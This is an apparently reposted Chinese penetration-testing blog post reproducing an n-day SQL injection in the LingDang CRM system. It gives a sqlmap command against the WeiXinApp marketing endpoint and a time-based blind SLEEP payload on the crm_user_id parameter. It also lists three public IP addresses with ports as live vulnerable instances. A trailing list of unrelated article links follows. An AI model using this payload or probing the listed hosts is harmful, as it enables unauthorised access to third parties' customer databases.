当前位置: 首页 > article >正文

【渗透测试】-灵当CRM系统-sql注入漏洞复现

文章目录

概要  

灵当CRM系统sql注入漏洞:  

具体实例: 

技术名词解释 

小结

概要   

近期灵当CRM系统爆出sql注入漏洞,我们来进行nday复现。

灵当CRM系统sql注入漏洞:

Python sqlmap.py -u

"http://0.0.0.0:0000/crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1 "

得到pyload:

module=WxOrder&action=getOrderList&crm_user_id=1

AND (SELECT 8411 FROM (SELECT(SLEEP(5)))AlRO)

返回信息:

具体实例:

1. http://8.130.119.94:85/crm/

2. 121.204.162.153:82/crm

3. 175.178.129.225:85/crm/

技术名词解释

payload:hacker通过漏洞向受攻击系统发送的恶意代码或指令,用于实现攻击目的。

CRM系统:客户关系管理系统,是一种通过信息化手段来自动化、规范化管理客户关系和客户数据的软件系统,主要目的是帮助企业提升客户满意度、增加客户忠诚度,从而实现业务增长与盈利能力的提高。

小结

通常一个系统漏洞的危害在于用户的数量,用户的数量,影响的范围越广。


http://www.kler.cn/news/319814.html

相关文章:

  • 传输层协议 —— TCP协议(下篇)
  • Spring IoC DI 之 属性注入
  • BottomNavigationView 添加角标
  • c++开发实战之网络编程(一)
  • 三维重建的几何评价指标
  • 面试算法题精讲:求数组两组数差值和的最大值
  • 只出现一次的数字 II
  • Redis:事务
  • Hive 的窗口函数 详解
  • 代码随想录算法训练营| 454.四数相加II 、 383. 赎金信 、 15. 三数之和 、 18. 四数之和
  • 有威胁的武器武装检测系统源码分享
  • WebGL渲染与创建2D内容
  • 树——数据结构
  • 移动端如何实现智能语音交互
  • 【LGR-200-Div.4】洛谷入门赛 #27 A - H题解,包含(C++, Go语言)
  • Mybatis中sql数组为空判断
  • SpringBoot 整合docker,执行容器服务
  • Qt系统相关——事件
  • JavaScript --模版字符串用反引号
  • Qt (19)【Qt 线程安全 | 互斥锁QMutex QMutexLocker | 条件变量 | 信号量】
  • python学习笔记(3)——控制语句
  • Java获取Object中Value的方法
  • 数据结构-3.链表
  • 无人机在隧道中如何实现在无卫星信号下的自主导航
  • 将ipad作为数位板使用教程/出现延迟拖拽怎么办?
  • 在jupyter notebook中取消代理服务器的解决方案
  • 编程遇到问题了?一个命令让 AI 解决你的困惑!
  • Android——内部/外部存储
  • HTTP常见状态码 HTTP的逐步发展(通俗易懂版)
  • 利士策分享,赚钱有道,底线思维不可抛